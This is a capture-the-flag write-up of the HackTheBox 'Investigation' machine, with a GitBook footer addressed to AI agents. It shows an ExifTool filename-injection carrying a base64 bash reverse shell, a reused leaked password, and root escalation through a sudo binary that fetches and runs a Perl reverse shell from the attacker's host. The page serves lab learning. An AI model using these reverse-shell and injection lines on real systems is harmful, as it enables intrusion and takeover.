# HackTheBox "Investigation"
Info Card

Info Card

## Introduction [Investigation](https://www.hackthebox.com/machines/investigation) is a medium box released on January 21st, 2023 by Derezzed. ## User Own Nmap scan: ``` Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 14:02 EDT Nmap scan report for 10.10.11.197 Host is up (0.033s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 2f1e6306aa6ebbcc0d19d4152674c6d9 (RSA) | 256 274520add2faa73a8373d97c79abf30b (ECDSA) |_ 256 4245eb916e21020617b2748bc5834fe0 (ED25519) 80/tcp open http Apache httpd 2.4.41 |_http-title: Did not follow redirect to http://eforenzics.htb/ |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds ``` The website has a file upload that will take an image file and return a text file of the detailed contents of the uploaded image. {% code title="Example Output" %} ``` ExifTool Version Number : 12.37 File Name : test.png Directory : . File Size : 384 bytes File Modification Date/Time : 2023:04:19 18:06:38+00:00 File Access Date/Time : 2023:04:19 18:06:38+00:00 File Inode Change Date/Time : 2023:04:19 18:06:38+00:00 File Permissions : -rw-r--r-- File Type : PNG File Type Extension : png MIME Type : image/png Image Width : 200 Image Height : 150 Bit Depth : 4 Color Type : Palette Compression : Deflate/Inflate Filter : Adaptive Interlace : Noninterlaced Gamma : 2.2 White Point X : 0.3127 White Point Y : 0.329 Red X : 0.64 Red Y : 0.33 Green X : 0.3 Green Y : 0.6 Blue X : 0.15 Blue Y : 0.06 Palette : (Binary data 24 bytes, use -b option to extract) Background Color : 0 Modify Date : 2022:08:10 03:53:15 Warning : [minor] Text/EXIF chunk(s) found after PNG IDAT (may be ignored by some readers) Datecreate : 2022-08-10T03:53:15+00:00 Datemodify : 2022-08-10T03:53:15+00:00 Image Size : 200x150 Megapixels : 0.030 ``` {% endcode %} According to the output, the tool used to gather the image details is ExifTool 12.37. This version of ExifTool is vulnerable to CVE-2022-23935. We can rename a `.jpg` or `.png` file to be a command that would give us a reverse shell, like `bash -i >& /dev/tcp/10.0.x.x/1234 0>&1`, but we can't have forward slashes in the filename. We can bypass this issue by encoding the reverse shell in Base64, and then decoding on the machine using the command `echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLngueC8xMjM0IDA+JjE= | base64 -d | bash |`. The Base64 encoded string contains the bash reverse shell that the server will run when the image is uploaded. After gaining a reverse shell, we are logged in as `www-data`. Checking `/etc/passwd` reveals one user named `smorton`. Attempting to find anything owned by `smorton` reveals a `.msg` file. ``` find / -user smorton 2>/dev/null /home/smorton /usr/local/investigation/Windows Event Logs for Analysis.msg ``` We can download this file by using the command `cp "Windows Event Logs for Analysis.msg" /var/www/html/analysed_images/w.msg` and then going to the link `http://eforenzics.htb/analysed_images/w.msg`. This `.msg` file is supposed to be opened with Outlook. We can convert this to a `.eml` with [`msgconvert`](https://superuser.com/a/979603) and open it in Thunderbird. ``` Hi Steve, Can you look through these logs to see if our analysts have been logging on to the inspection terminal. I'm concerned that they are moving data on to production without following our data transfer procedures. Regards. Tom ``` Attached to this email is `evtx-logs.zip`. Inside is `security.evtx`. The file format `.evtx` is a Microsoft Windows event log, which can be opened with Event Viewer in Windows. From [HackTricks](https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics#security), security logs can contain useful artifacts. Filtering the log with event ID 4625, we can see when someone tried to login but failed.
Log

Log

This log shows that someone accidentally used their password as their username. Logs afterward show that the user `SMorton` logged in successfully shortly after the failed login attempt, which means the password most likely belongs to him. Using the password `Def@ultf0r3nz!csPa$$` to login to `smorton` through SSH gets us in, which gets us the `user.txt` flag.
USER OWN

USER OWN

## System Own `sudo -l` reveals: ``` Matching Defaults entries for smorton on investigation: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User smorton may run the following commands on investigation: (root) NOPASSWD: /usr/bin/binary ``` Running /usr/bin/binary doesn't seem to do anything: ``` sudo /usr/bin/binary Exiting... ``` Let's get this binary file for decompilation. ``` scp smorton@eforenzics.htb:/usr/bin/binary ~/Documents/binary ``` We can use a simple decompiler like [Decompiler Explorer](https://dogbolt.org/) to see our code. The most accurate code output is from BinaryNinja: {% code lineNumbers="true" %} ```c int32_t main(int32_t argc, char** argv, char** envp) { if (argc != 3) { puts("Exiting... "); exit(0); /* no return */ } if (getuid() != 0) { puts("Exiting... "); exit(0); /* no return */ } if (strcmp(argv[2], "lDnxUysaQn") != 0) { puts("Exiting... "); exit(0); /* no return */ } puts("Running... "); FILE* rax_8 = fopen(argv[2], &data_2027); int64_t rax_9 = curl_easy_init(); int32_t var_40 = 0x2712; curl_easy_setopt(rax_9, 0x2712, argv[1], 0x2712); int32_t var_3c = 0x2711; curl_easy_setopt(rax_9, 0x2711, rax_8, 0x2711); int32_t var_38 = 0x2d; curl_easy_setopt(rax_9, 0x2d, 1, 0x2d); if (curl_easy_perform(rax_9) != 0) { puts("Exiting... "); exit(0); /* no return */ } int64_t rax_25 = snprintf(nullptr, 0, &data_202a, argv[2]); char* rax_28 = malloc((rax_25 + 1)); snprintf(rax_28, (rax_25 + 1), &data_202a, argv[2]); int64_t rax_37 = snprintf(nullptr, 0, "perl ./%s", rax_28); char* rax_40 = malloc((rax_37 + 1)); snprintf(rax_40, (rax_37 + 1), "perl ./%s", rax_28); fclose(rax_8); curl_easy_cleanup(rax_9); setuid(0); system(rax_40); system("rm -f ./lDnxUysaQn"); return 0; } ``` {% endcode %} The program has a couple checks to make sure we use it correctly. Firstly, the program checks if we have 3 arguments at line 3. If we don't have 3 arguments, we cannot pass. We would get pass this check by doing `sudo /usr/bin/binary arg2 arg3`. The first argument in C is always the program itself. Secondly, The program checks if our user ID is 0 at line 9. Since we are using `sudo`, we automatically pass this check (`root`'s user ID is 0). Thirdly, the program checks if our third argument equals `lDnxUysaQn` at line 15. Our statement now looks like `sudo /usr/bin/binary arg2 lDnxUysaQn`. After all these checks, the program initializes cURL at line 23 and sets the URL as the second argument at line 25. It then retrieves the file from the specified URL at line 30 and writes it to a temporary file called `lDnxUysaQn`. The program then runs this file with Perl as `root` at line 45. This means we can feed this program a Perl reverse shell as the first argument and get in as `root`. {% code title="Terminal 1" %} ``` python3 -m http.server 80 ``` {% endcode %} 
smorton@investigation:/tmp$ sudo /usr/bin/binary http://10.10.xx.xx/rev.pl lDnxUysaQn
Running...
Content-Length: 0
Connection: close
Content-Type: text/html

smorton@investigation:/tmp$ Content-Length: 42
Connection: close
Content-Type: text/html

Sent reverse shell to 10.10.xx.xx:1234<p>
{% code title="Terminal 3" %} ``` nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.197] 47318 03:30:49 up 23:12, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT smorton pts/2 10.10.xx.xx 02:13 1:07m 0.18s 0.18s -bash smorton pts/0 10.10.xx.xx 02:40 0.00s 0.15s 0.15s -bash Linux investigation 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) / /usr/sbin/apache: 0: can't access tty; job control turned off # cat /root/root.txt [ROOT FLAG HERE] ``` {% endcode %}
SYSTEM OWN

SYSTEM OWN

And that's the box!
PWNED

PWNED

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gitbook.bennettcl.app/write-ups/hackthebox-investigation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.